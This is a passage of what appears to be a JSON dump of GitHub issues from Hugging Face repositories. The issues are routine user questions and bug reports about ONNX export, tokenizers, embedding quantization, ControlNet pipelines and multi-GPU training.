"user": "veraburg" }, { "repo": "huggingface/optimum", "number": 1821, "title": "Idefics2 Support in Optimum for ONNX export", "body": "### Feature request\n\nWith reference to the new Idefics2 model- https://huggingface.co/HuggingFaceM4/idefics2-8b \r\nI would like to export it to ONNX which is currently not possible.\r\nPlease enable conversion support. Current Error with pip install transformers via GIT\r\n\r\n```\r\nTraceback (most recent call last):\r\n File \"/usr/local/bin/optimum-cli\", line 8, in \r\n sys.exit(main())\r\n File \"/usr/local/lib/python3.10/dist-packages/optimum/commands/optimum_cli.py\", line 163, in main\r\n service.run()\r\n File \"/usr/local/lib/python3.10/dist-packages/optimum/commands/export/onnx.py\", line 265, in run\r\n main_export(\r\n File \"/usr/local/lib/python3.10/dist-packages/optimum/exporters/onnx/__main__.py\", line 352, in main_export\r\n onnx_export_from_model(\r\n File \"/usr/local/lib/python3.10/dist-packages/optimum/exporters/onnx/convert.py\", line 1048, in onnx_export_from_model\r\n raise ValueError(\r\nValueError: Trying to export a idefics2 model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type idefics2 to be supported natively in the ONNX export.\r\n```\r\n\n\n### Motivation\n\nThe model is good and would like to export it to onnx asap\n\n### Your contribution\n\n-", "url": "https://github.com/huggingface/optimum/issues/1821", "state": "open", "labels": [ "feature-request", "onnx" ], "created_at": "2024-04-19T07:12:41Z", "updated_at": "2025-02-18T19:25:11Z", "comments": 8, "user": "gtx-cyber" }, { "repo": "huggingface/alignment-handbook", "number": 158, "title": "How to work with local data", "body": "I downloaded a dataset from hf. I want to load it locally, but it still tries to download it from hf and place it into the cache. \r\nHow can I use the local one I already downloaded? \r\n\r\nThank you. ", "url": "https://github.com/huggingface/alignment-handbook/issues/158", "state": "open", "labels": [], "created_at": "2024-04-18T10:26:14Z", "updated_at": "2024-05-14T11:20:55Z", "user": "pretidav" }, { "repo": "huggingface/optimum-quanto", "number": 182, "title": "Can I use quanto on AMD GPU?", "body": "Does quanto work with AMD GPUs ?", "url": "https://github.com/huggingface/optimum-quanto/issues/182", "state": "closed", "labels": [ "question", "Stale" ], "created_at": "2024-04-18T03:06:54Z", "updated_at": "2024-05-25T01:49:56Z", "user": "catsled" }, { "repo": "huggingface/accelerate", "number": 2680, "title": "How to get pytorch_model.bin from ckeckpoint files without zero_to_fp32.py", "body": "", "url": "https://github.com/huggingface/accelerate/issues/2680", "state": "closed", "labels": [], "created_at": "2024-04-17T11:30:32Z", "updated_at": "2024-04-18T22:40:14Z", "user": "lipiji" }, { "repo": "huggingface/datasets", "number": 6819, "title": "Give more details in `DataFilesNotFoundError` when getting the config names", "body": "### Feature request\n\nAfter https://huggingface.co/datasets/cis-lmu/Glot500/commit/39060e01272ff228cc0ce1d31ae53789cacae8c3, the dataset viewer gives the following error:\r\n\r\n```\r\n{\r\n \"error\": \"Cannot get the config names for the dataset.\",\r\n \"cause_exception\": \"DataFilesNotFoundError\",\r\n \"cause_message\": \"No (supported) data files found in cis-lmu/Glot500\",\r\n \"cause_traceback\": [\r\n \"Traceback (most recent call last):\\n\",\r\n \" File \\\"/src/services/worker/src/worker/job_runners/dataset/config_names.py\\\", line 73, in compute_config_names_response\\n config_names = get_dataset_config_names(\\n\",\r\n \" File \\\"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/inspect.py\\\", line 347, in get_dataset_config_names\\n dataset_module = dataset_module_factory(\\n\",\r\n \" File \\\"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/load.py\\\", line 1873, in dataset_module_factory\\n raise e1 from None\\n\",\r\n \" File \\\"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/load.py\\\", line 1854, in dataset_module_factory\\n return HubDatasetModuleFactoryWithoutScript(\\n\",\r\n \" File \\\"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/load.py\\\", line 1245, in get_module\\n module_name, default_builder_kwargs = infer_module_for_data_files(\\n\",\r\n \" File \\\"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/load.py\\\", line 595, in infer_module_for_data_files\\n raise DataFilesNotFoundError(\\\"No (supported) data files found\\\" + (f\\\" in {path}\\\" if path else \\\"\\\"))\\n\",\r\n \"datasets.exceptions.DataFilesNotFoundError: No (supported) data files found in cis-lmu/Glot500\\n\"\r\n ]\r\n}\r\n```\r\n\r\nbecause the deleted files were still listed in the README, see https://huggingface.co/datasets/cis-lmu/Glot500/discussions/4\r\n\r\nIdeally, the error message would include the name of the first configuration with missing files, to help the user understand how to fix it. Here, it would tell that configuration `aze_Ethi` has no supported data files, instead of telling that the `cis-lmu/Glot500` *dataset* has no supported data files (which is not true).\n\n### Motivation\n\nGiving more detail in the error would help the Datasets Hub users to debug why the dataset viewer does not work.\n\n### Your contribution\n\nNot sure how to best fix this, as there are a lot of loops on the dataset configs in the traceback methods. \"maybe\" it would be easier to handle if the code was completely isolating each config.", "url": "https://github.com/huggingface/datasets/issues/6819", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-04-17T11:19:47Z", "updated_at": "2024-04-17T11:19:47Z", "comments": 0, "user": "severo" }, { "repo": "huggingface/optimum", "number": 1818, "title": "Request for ONNX Export Support for Blip Model in Optimum", "body": "Hi Team, \r\n\r\nI hope this message finds you well. \r\n\r\n I've encountered an issue while attempting to export Blip model into the ONNX format using Optimum. I have used below command.\r\n\r\n`! optimum-cli export onnx -m Salesforce/blip-itm-base-coco --task feature-extraction blip_onnx`\r\n\r\n It appears that Optimum currently lacks support for this functionality, leading to errors during the export process.\r\n\r\n `ValueError: Trying to export a blip model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type blip to be supported natively in the ONNX export`\r\n \r\nCould you kindly provide insights into when we might expect support for exporting Blip models to ONNX to be implemented in Optimum?\r\n\r\nThank you for considering this request. I look forward to any updates or information you can provide on this matter.\r\n ", "url": "https://github.com/huggingface/optimum/issues/1818", "state": "open", "labels": [ "feature-request", "question", "onnx" ], "created_at": "2024-04-17T08:55:45Z", "updated_at": "2024-10-14T12:26:36Z", "user": "n9s8a" }, { "repo": "huggingface/transformers.js", "number": 715, "title": "How to unload/destroy a pipeline?", "body": "### Question\n\nI tried to find how to unload a pipeline to free up memory in the documentation, but couldn't find a mention of how to do that properly.\r\n\r\nIf there a proper way to \"unload\" a pipeline?\r\n\r\nI'd be happy to add the answer to the documentation.", "url": "https://github.com/huggingface/transformers.js/issues/715", "state": "closed", "labels": [ "question" ], "created_at": "2024-04-16T09:02:05Z", "updated_at": "2024-05-29T09:32:23Z", "user": "flatsiedatsie" }, { "repo": "huggingface/transformers.js", "number": 714, "title": "Reproducing model conversions", "body": "### Question\r\n\r\nI'm trying to reproduce the conversion of `phi-1_5_dev` to better understand the process. I'm running into a few bugs / issues along the way that I thought it'd be helpful to document.\r\n\r\nThe model [`@Xenova/phi-1_5_dev`](https://huggingface.co/Xenova/phi-1_5_dev) states:\r\n\r\n> https://huggingface.co/susnato/phi-1_5_dev with ONNX weights to be compatible with Transformers.js.\r\n\r\nI'm doing the following:\r\n\r\n```\r\ngit clone https://github.com/xenova/transformers.js.git && cd transformers.js/scripts\r\ngit clone https://huggingface.co/susnato/phi-1_5_dev\r\npython3 -m venv .venv && source .venv/bin/activate && pip install -r requirements.txt\r\npython3 convert.py --quantize --model_id phi-1_5_dev --task \"text-generation\"\r\n```\r\n\r\nHere, I hit my first issue - it looks like `transformers` on `pypi` does not support Phi:\r\n\r\n```\r\n raise KeyError(key)\r\nKeyError: 'phi'\r\n```\r\n\r\nSo I install from Github:\r\n\r\n```\r\npip install git+https://github.com/huggingface/transformers.git\r\n```\r\n\r\nThat produces:\r\n\r\n```\r\nRuntimeError: Failed to import optimum.exporters.onnx.__main__ because of the following error (look up to see its traceback):\r\ncannot import name 'is_torch_less_than_1_11' from 'transformers.pytorch_utils' (/Users/thekevinscott/code/codegen/research/model-conversion/throwaway/transformers.js/scripts/.venv/lib/python3.10/site-packages/transformers/pytorch_utils.py)\r\n```\r\n\r\nI believe `optimum` is also out of date:\r\n\r\n```\r\npip install git+https://github.com/huggingface/optimum.git\r\n```\r\n\r\nWith those two dependencies updated, this command now works:\r\n\r\n```\r\npython3 convert.py --quantize --model_id phi-1_5_dev --task \"text-generation\"\r\n```\r\n\r\nThough there are a few warnings I'm assuming I can ignore:\r\n\r\n```\r\nIgnore MatMul due to non constant B: /[/model/layers.22/self_attn/MatMul]\r\nIgnore MatMul due to non constant B: /[/model/layers.22/self_attn/MatMul_1]\r\nIgnore MatMul due to non constant B: /[/model/layers.23/self_attn/MatMul]\r\nIgnore MatMul due to non constant B: /[/model/layers.23/self_attn/MatMul_1]\r\n```\r\n\r\nHowever, out of the box it can't find the right `onnx` file:\r\n\r\n```\r\nError: `local_files_only=true` or `env.allowRemoteModels=false` and file was not found locally at \"transformers.js/scripts/models/phi-1_5_dev/onnx/decoder_model_merged_quantized.onnx\".\r\n```\r\n\r\nI see in the [`@Xenova` repo history](https://huggingface.co/Xenova/phi-1_5_dev/commit/ae1a980babe16f9d136c22eb119d171dec7c6a09) that the files were manually renamed; I'll try that too:\r\n\r\n```\r\nmv model.onnx decoder_model_merged.onnx\r\nmv model_quantized.onnx decoder_model_merged_quantized.onnx\r\nmv model.onnx_data decoder_model_merged.onnx_data\r\n```\r\n\r\nI then try to run the model with:\r\n\r\n```\r\n const model = await loadModel('transformers.js/scripts/models/phi-1_5_dev', {\r\n });\r\n\r\n const result = await model('Write me a list of numbers:\\n', {\r\n });\r\n console.log('result', result);\r\n```\r\n\r\nThe model loads, but upon generating I see:\r\n\r\n```\r\nWARNING: Too many inputs were provided (51 > 3). The following inputs will be ignored: \"past_key_values.0.key, past_key_values.0.value, past_key_values.1.key, past_key_values.1.value, past_key_values.2.key, past_key_values.2.value, past_key_values.3.key, past_key_values.3.value, past_key_values.4.key, past_key_values.4.value, past_key_values.5.key, past_key_values.5.value, past_key_values.6.key, past_key_values.6.value, past_key_values.7.key, past_key_values.7.value, past_key_values.8.key, past_key_values.8.value, past_key_values.9.key, past_key_values.9.value, past_key_values.10.key, past_key_values.10.value, past_key_values.11.key, past_key_values.11.value, past_key_values.12.key, past_key_values.12.value, past_key_values.13.key, past_key_values.13.value, past_key_values.14.key, past_key_values.14.value, past_key_values.15.key, past_key_values.15.value, past_key_values.16.key, past_key_values.16.value, past_key_values.17.key, past_key_values.17.value, past_key_values.18.key, past_key_values.18.value, past_key_values.19.key, past_key_values.19.value, past_key_values.20.key, past_key_values.20.value, past_key_values.21.key, past_key_values.21.value, past_key_values.22.key, past_key_values.22.value, past_key_values.23.key, past_key_values.23.value\".\r\n2024-04-15 11:00:50.956 node[91488:12372370] 2024-04-15 11:00:50.956090 [E:onnxruntime:, sequential_executor.cc:494 ExecuteKernel] Non-zero status code returned while running Gather node. Name:'/model/layers.0/self_attn/Gather_4' Status Message: indices element out of data bounds, idx=8 must be within the inclusive range [-1,0]\r\nAn error occurred during model execution: \"Error: Non-zero status code returned while running Gather node. Name:'/model/layers.0/self_attn/Gather_4' Status Message: indices element out of data bounds, idx=8 must be within the inclusive range [-1,0]\".\r\nInputs given to model: [Object: null prototype] {\r\n input_ids: Tensor {\r\n dims: [ 1, 1 ],\r\n type: 'int64',\r\n data: BigInt64Array(1) [ 13n ],\r\n size: 1\r\n },\r\n attention_mask: T", "url": "https://github.com/huggingface/transformers.js/issues/714", "state": "open", "labels": [ "question" ], "created_at": "2024-04-15T15:02:33Z", "updated_at": "2024-05-10T14:26:00Z", "user": "thekevinscott" }, { "repo": "huggingface/sentence-transformers", "number": 2594, "title": "What is the maximum number of sentences that a fast cluster can cluster?", "body": "What is the maximum number of sentences that a fast cluster can cluster? When I cluster 2 million sentences, the cluster gets killed.", "url": "https://github.com/huggingface/sentence-transformers/issues/2594", "state": "open", "labels": [], "created_at": "2024-04-15T09:55:06Z", "updated_at": "2024-04-15T09:55:06Z", "user": "BinhMinhs10" }, { "repo": "huggingface/dataset-viewer", "number": 2721, "title": "Help dataset owner to chose between configs and splits?", "body": "See https://huggingface.slack.com/archives/C039P47V1L5/p1713172703779839\r\n\r\n> Am I correct in assuming that if you specify a \"config\" in a dataset, only the given config is downloaded, but if you specify a split, all splits for that config are downloaded? I came across it when using facebook's belebele (https://huggingface.co/datasets/facebook/belebele). Instead of a config for each language, they use a split for each language, but that seems to mean that the full dataset is downloaded, even if you select just one language split.\r\n\r\nFor languages, we recommend using different configs, not splits.\r\n\r\nMaybe we should also show a warning / open a PR/discussion? when a dataset contains more than 5 splits, hinting that it might be better to use configs?", "url": "https://github.com/huggingface/dataset-viewer/issues/2721", "state": "open", "labels": [ "question", "P2" ], "created_at": "2024-04-15T09:51:43Z", "updated_at": "2024-05-24T15:17:51Z", "user": "severo" }, { "repo": "huggingface/diffusers", "number": 7676, "title": "How to determine the type of file, such as checkpoint, etc.", "body": "Hello.\r\nIs there some kind of script that determines the type of file \"checkpoint\", \"LORA\", \"textual_inversion\", etc.?", "url": "https://github.com/huggingface/diffusers/issues/7676", "state": "closed", "labels": [], "created_at": "2024-04-14T23:58:08Z", "updated_at": "2024-04-15T02:50:43Z", "user": "suzukimain" }, { "repo": "huggingface/diffusers", "number": 7670, "title": "How to use IDDPM in diffusers ?", "body": "The code base is here:\r\nhttps://github.com/openai/improved-diffusion/blob/main/improved_diffusion/gaussian_diffusion.py", "url": "https://github.com/huggingface/diffusers/issues/7670", "state": "closed", "labels": [ "should-move-to-discussion" ], "created_at": "2024-04-14T12:30:34Z", "updated_at": "2024-11-20T00:17:18Z", "user": "jiarenyf" }, { "repo": "huggingface/transformers.js", "number": 713, "title": "Help understanding logits and model vocabs", "body": "### Question\r\n\r\nI'm trying to write a custom `LogitsProcessor` and have some questions. For reference, I'm using [`Xenova/phi-1_5_dev`](https://huggingface.co/Xenova/phi-1_5_dev). I'm trying to implement a custom logic for white or blacklisting tokens, but running into difficulties understanding how to interpret token ids, tokens, and their decoded counterparts.\r\n\r\nHere's what I think I understand:\r\n\r\n- [The vocab file is defined at `vocab.json`](https://huggingface.co/Xenova/phi-1_5_dev/blob/main/vocab.json), and has 50,257 entries. \r\n- This file is exposed on `pipeline.tokenizer.vocab`, translated from the object representation of `vocab.json` (`{ token: tokenID }`), to an array of `token`s whose indices correspond to `tokenID`. \r\n - **Question:** `vocab.json` has 50,257 entries, but `pipeline.tokenizer.vocab` has 50,295 entries. Is this because `pipeline.tokenizer.vocab` _also_ includes `added_tokens.json`?\r\n - And [`special_tokens_map.json`](https://huggingface.co/Xenova/phi-1_5_dev/blob/main/special_tokens_map.json) is already included in `vocab.json` it appears\r\n- The tokens in the vocab file must be decoded before being displayed\r\n - for example, the token in `vocab.json` at `50255` is `\"\u0120gazed\"`, but if I decode this character by character (`pipeline.tokenizer.decoder.byte_decoder('\u0120')` becomes `32` which corresponds to a space `\" \"`) I get `\" gazed\"`. I _think_ these correspond to code points.\r\n- The `logits` argument contains scores where the index of each score is the `tokenID`. So setting the score at position `50255` to `-Infinity` should ensure that the token `\"\u0120gazed\"` (or, decoded, `\" gazed\"`) should never appear.\r\n- The `logits` argument I'm getting back for this model in my `LogitsProcessor` has dimensions of `[51200,]`. `pipeline.tokenizer.vocab` has size of is 50,295. That would seem to indicate 905 unused tokens at the end of the tensor; can these be safely ignored, or do they correspond to something important that I'm missing?\r\n\r\nI'd appreciate any insight or feedback on whether my assumptions above are correct or not. Thank you!", "url": "https://github.com/huggingface/transformers.js/issues/713", "state": "closed", "labels": [ "question" ], "created_at": "2024-04-13T21:06:14Z", "updated_at": "2024-04-14T15:17:43Z", "user": "thekevinscott" }, { "repo": "huggingface/lighteval", "number": 155, "title": "How to run 30b plus model with lighteval when accelerate launch failed? OOM", "body": "CUDA Memory OOM when I launch an evaluation for 30b model using lighteval.\r\n\r\n\r\nWhats the correct config for it?", "url": "https://github.com/huggingface/lighteval/issues/155", "state": "closed", "labels": [], "created_at": "2024-04-13T03:49:20Z", "updated_at": "2024-05-04T11:18:38Z", "user": "xiechengmude" }, { "repo": "huggingface/transformers", "number": 30213, "title": "Mamba: which tokenizer has been saved and how to use it?", "body": "### System Info\n\nHardware independent.\n\n### Who can help?\n\n@ArthurZucker \r\n\r\nI described the doubts in the link below around 1 month ago, but maybe model-hub discussions are not so active. Then I post it here as repo issue. Please, let me know where to discuss it :)\r\n\r\nhttps://huggingface.co/state-spaces/mamba-2.8b-hf/discussions/1\r\n\r\nThanks!\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n.\n\n### Expected behavior\n\n.", "url": "https://github.com/huggingface/transformers/issues/30213", "state": "closed", "labels": [], "created_at": "2024-04-12T11:28:17Z", "updated_at": "2024-05-17T13:13:12Z", "user": "javiermcebrian" }, { "repo": "huggingface/sentence-transformers", "number": 2587, "title": "Implementing Embedding Quantization for Dynamic Serving Contexts", "body": "I'm currently exploring embedding quantization strategies to enhance storage and computation efficiency while maintaining high accuracy. Specifically, I'm looking at integrating these strategies with Infinity (https://github.com/michaelfeil/infinity/discussions/198), a high-throughput, low-latency REST API for serving vector embeddings. \r\n\r\nHere is the quantization method I want to use from sentence-transformers (specifically scalar int8, because binary quant. also reduces the vector dimensions, something I do not want to keep the accuracy high): https://sbert.net/examples/applications/embedding-quantization/README.html\r\n\r\nSo this is what I want to apply:\r\n```\r\nfrom sentence_transformers import SentenceTransformer\r\nfrom sentence_transformers.quantization import quantize_embeddings\r\nfrom datasets import load_dataset\r\n\r\n# 1. Load an embedding model\r\nmodel = SentenceTransformer(\"mixedbread-ai/mxbai-embed-large-v1\")\r\n\r\n# 2. Prepare an example calibration dataset\r\ncorpus = load_dataset(\"nq_open\", split=\"train[:1000]\")[\"question\"]\r\ncalibration_embeddings = model.encode(corpus)\r\n\r\n# 3. Encode some text without quantization & apply quantization afterwards\r\nembeddings = model.encode([\"I am driving to the lake.\", \"It is a beautiful day.\"])\r\nint8_embeddings = quantize_embeddings(\r\n embeddings,\r\n precision=\"int8\",\r\n calibration_embeddings=calibration_embeddings,\r\n)\r\n```\r\n\r\nThe main challenge for me which arises with scalar quantization is, that it requires a calibration dataset to compute min and max values, making the embedding process stateful. This conflicts with the need for a flexible, dynamic serving via the Infinity API, which typically handles embeddings on the fly. So this embedding API I created is used by various other services which have different types of datasets. Therefore I am looking for a way to not need such calibration dataset.\r\n\r\nI am seeking advice on:\r\n\r\n- Managing the statefulness introduced by scalar quantization.\r\n- Alternative strategies that might be more suitable for dynamic environments where embeddings are generated on demand.\r\n- Any guidance or suggestions on how to tackle these issues would be greatly appreciated.\r\n\r\nThank you!", "url": "https://github.com/huggingface/sentence-transformers/issues/2587", "state": "open", "labels": [ "question" ], "created_at": "2024-04-11T11:03:23Z", "updated_at": "2024-04-12T07:28:48Z", "user": "Nookbe" }, { "repo": "huggingface/diffusers", "number": 7636, "title": "how to use the controlnet sdxl tile model in diffusers", "body": "### Describe the bug\n\nI want to use [this model](https://huggingface.co/TTPlanet/TTPLanet_SDXL_Controlnet_Tile_Realistic_V1) to make my slightly blurry photos clear, so i found this model. \r\nI follow the code [here](https://huggingface.co/lllyasviel/control_v11f1e_sd15_tile) , but as the model mentioned above is XL not 1.5 , so i change the code, but it error.\n\n### Reproduction\n\nimport torch\r\nfrom PIL import Image\r\nfrom diffusers import ControlNetModel, DiffusionPipeline, StableDiffusionXLControlNetPipeline\r\n\r\ndef resize_for_condition_image(input_image: Image, resolution: int):\r\n input_image = input_image.convert(\"RGB\")\r\n W, H = input_image.size\r\n k = float(resolution) / min(H, W)\r\n H *= k\r\n W *= k\r\n H = int(round(H / 64.0)) * 64\r\n W = int(round(W / 64.0)) * 64\r\n img = input_image.resize((W, H), resample=Image.LANCZOS)\r\n return img\r\n\r\ncontrolnet = ControlNetModel.from_pretrained('/mnt/asian-t2i/pretrained_models/TTPLanet_SDXL_Controlnet_Tile_Realistic_V1', \r\n torch_dtype=torch.float16, use_safetensors = True)\r\n\r\npipe = DiffusionPipeline.from_pretrained(\"/mnt/asian-t2i/pretrained_models/RealVisXL_V3.0\",\r\n custom_pipeline=\"stable_diffusion_controlnet_img2img\",\r\n controlnet=controlnet,\r\n torch_dtype=torch.float16,).to('cuda')\r\n\r\npipe.enable_xformers_memory_efficient_attention()\r\n\r\nsource_image = Image.open(\"/mnt/asian-t2i/data/luchuan/1024/0410-redbook-luchuan-6.jpg\")\r\n\r\ncondition_image = resize_for_condition_image(source_image, 1024)\r\n\r\nimage = pipe(\r\n prompt=\"best quality\", \r\n negative_prompt=\"blur, lowres, bad anatomy, bad hands, cropped, worst quality\", \r\n image=condition_image, \r\n controlnet_conditioning_image=condition_image, \r\n width=condition_image.size[0],\r\n height=condition_image.size[1],\r\n strength=1.0,\r\n generator=torch.manual_seed(0),\r\n num_inference_steps=32,\r\n ).images[0]\r\n\r\nimage.save('output.png')\r\n\n\n### Logs\n\n```shell\n/opt/conda/lib/python3.10/site-packages/huggingface_hub/file_download.py:678: FutureWarning: 'cached_download' is the legacy way to download files from the HF hub, please consider upgrading to 'hf_hub_download'\r\n warnings.warn(\r\nLoading pipeline components...: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 5/5 [00:02<00:00, 2.00it/s]\r\nYou have disabled the safety checker for by passing `safety_checker=None`. Ensure that you abide to the conditions of the Stable Diffusion license and do not expose unfiltered results in services or applications open to the public. Both the diffusers team and Hugging Face strongly recommend to keep the safety filter enabled in all public facing circumstances, disabling it only for use-cases that involve analyzing network behavior or auditing its results. For more information, please have a look at https://github.com/huggingface/diffusers/pull/254 .\r\n 0%| | 0/32 [00:00\r\n image = pipe(\r\n File \"/opt/conda/lib/python3.10/site-packages/torch/utils/_contextlib.py\", line 115, in decorate_context\r\n return func(*args, **kwargs)\r\n File \"/root/.cache/huggingface/modules/diffusers_modules/git/stable_diffusion_controlnet_img2img.py\", line 839, in __call__\r\n down_block_res_samples, mid_block_res_sample = self.controlnet(\r\n File \"/opt/conda/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1511, in _wrapped_call_impl\r\n return self._call_impl(*args, **kwargs)\r\n File \"/opt/conda/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1520, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/mnt/asian-t2i/diffusers/src/diffusers/models/controlnet.py\", line 775, in forward\r\n if \"text_embeds\" not in added_cond_kwargs:\r\nTypeError: argument of type 'NoneType' is not iterable\n```\n\n\n### System Info\n\nName: diffusers\r\nVersion: 0.27.0.dev0\n\n### Who can help?\n\n@sayakpaul @yiyixuxu @DN6 ", "url": "https://github.com/huggingface/diffusers/issues/7636", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2024-04-11T03:20:42Z", "updated_at": "2024-06-29T13:26:58Z", "user": "xinli2008" }, { "repo": "huggingface/optimum-quanto", "number": 161, "title": "Question: any plan to formally support smooth quantization and make it more general", "body": "Awesome work!\r\n\r\nI noticed there are smooth quant implemented under [external](https://github.com/huggingface/quanto/tree/main/external/smoothquant). Currently, its implementation seems to be model-specific, we can only apply smooth on special `Linear`. \r\nHowever, in general, the smooth can be applied on any `Linear` by inserting a `mul`. Are there any plans to officially support smooth quantization in-tree? My initial thought was, is it possible to define a `SmoothTensor` and use `__torch_dispatch__` to override the `bmm` behavior?", "url": "https://github.com/huggingface/optimum-quanto/issues/161", "state": "closed", "labels": [ "question", "Stale" ], "created_at": "2024-04-11T02:45:31Z", "updated_at": "2024-05-18T01:49:52Z", "user": "yiliu30" }, { "repo": "huggingface/accelerate", "number": 2647, "title": "How to use deepspeed with dynamic batch?", "body": "### System Info\n\n```Shell\n- `Accelerate` version: 0.29.1\r\n- Platform: Linux-5.19.0-46-generic-x86_64-with-glibc2.35\r\n- `accelerate` bash location: /home/yuchao/miniconda3/envs/TorchTTS/bin/accelerate\r\n- Python version: 3.10.13\r\n- Numpy version: 1.23.5\r\n- PyTorch version (GPU?): 2.2.2+cu118 (True)\r\n- PyTorch XPU available: False\r\n- PyTorch NPU available: False\r\n- PyTorch MLU available: False\r\n- System RAM: 125.48 GB\r\n- GPU type: NVIDIA GeForce RTX 4090\r\n- `Accelerate` default config:\r\n gradient_accumulation_steps: 1\r\n gradient_clipping: 1.0\r\n offload_optimizer_device: none\r\n offload_param_device: none\r\n zero3_init_flag: false\r\n zero_stage: 2\n```\n\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nFor sequence task, we always use dynamic batch to group long sequence to small batches while group short sequence to large batches. But deepspeed here needs to specify either `batch_size` or `train_micro_batch_size_per_gpu` which is unavailable for use. Any idea to fix that?\r\n```\r\nWhen using DeepSpeed, `accelerate.prepare()` requires you to pass at least one of training or evaluation dataloaders with `batch_size` attribute returning an integer value or alternatively set an integer value in `train_micro_batch_size_per_gpu` in the deepspeed config file or assign integer value to `AcceleratorState().deepspeed_plugin.deepspeed_config['train_micro_batch_size_per_gpu']`.\r\n```\n\n### Expected behavior\n\nBe able to train deepspeed with dynamic batch", "url": "https://github.com/huggingface/accelerate/issues/2647", "state": "closed", "labels": [], "created_at": "2024-04-10T09:09:53Z", "updated_at": "2025-05-11T15:07:27Z", "user": "npuichigo" }, { "repo": "huggingface/transformers.js", "number": 690, "title": "Is top-level await necessary in the v3 branch?", "body": "### Question\r\n\r\nI saw the excellent performance of WebGPU, so I tried to install xenova/transformers.js#v3 as a dependency in my project.\r\n\r\nI found that v3 uses the top-level await syntax. If I can't restrict users to using the latest browser version, I have to make it compatible (using `vite-plugin-top-level-await` or `rollup-plugin-tla`).\r\n\r\nIs it possible to use other methods instead of top-level await? Or is this project not intended to support users who do not have support for top-level await?\r\n\r\nThanks.", "url": "https://github.com/huggingface/transformers.js/issues/690", "state": "closed", "labels": [ "question" ], "created_at": "2024-04-10T08:49:32Z", "updated_at": "2024-04-11T17:18:42Z", "user": "ceynri" }, { "repo": "huggingface/optimum-quanto", "number": 158, "title": "How dose quanto support int8 conv2d and linear?", "body": "Hi, I look into the code and didn't find any cuda kernel related to conv2d and linear. How did you implement the cuda backend for conv2d/linear? Thanks", "url": "https://github.com/huggingface/optimum-quanto/issues/158", "state": "closed", "labels": [ "question" ], "created_at": "2024-04-10T05:41:43Z", "updated_at": "2024-04-11T09:26:35Z", "user": "zhexinli" }, { "repo": "huggingface/transformers.js", "number": 689, "title": "Abort the audio recognition process", "body": "### Question\n\nHello! How can I stop the audio file recognition process while leaving the loaded model? If I terminate the worker I have to reload the model to start the process of recognizing a new audio file. I need either functionality to be able to send a pipeline command to stop the recognition process, or the ability to first load the model and then pass it as an object to the pipeline. Thank you.", "url": "https://github.com/huggingface/transformers.js/issues/689", "state": "open", "labels": [ "question" ], "created_at": "2024-04-10T02:51:37Z", "updated_at": "2024-04-20T06:09:11Z", "user": "innoware11" }, { "repo": "huggingface/transformers", "number": 30154, "title": "Question about how to write code for trainer and dataset for multi-gpu ", "body": "### System Info\n\n- Platform: Linux-5.15.0-1026-aws-x86_64-with-glibc2.29\r\n- Python version: 3.8.10\r\n- Huggingface_hub version: 0.20.3\r\n- Safetensors version: 0.4.2\r\n- Accelerate version: 0.27.2\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nHi I have a quick question on how to write code for dataset and trainer for multi-gpu setting.\r\n\r\nHere is my workflow.\r\n\r\n\r\nI have a dataset where I called \r\n``` \r\ndataset = dataset.load_dataset(...) \r\n```\r\nI need to do some preprocessing for it and the dataset becomes an Iterable dataset. \r\nand then I pass the dataset into the trainer like \r\n```\r\ntrainer = Trainer(train_data=dataset)\r\ntrainer.train()\r\n```\r\n\r\nMy question is since I am running on multi-gpu and use command \r\n```\r\ntorchrun --standalone --nnodes=1 --nproc_per_node=2 train_lora.py\r\n```\r\nTwo process is executing the same code above and this cause dataset and trainer created twice. Should the dataset and trainer be created once or twice? If created once, should I wrapper all the code like that?\r\n\r\n```\r\nif accelerator.is_main_process:\r\n dataset = dataset.load_dataset(...) \r\n trainer = Trainer(train_data=dataset)\r\n 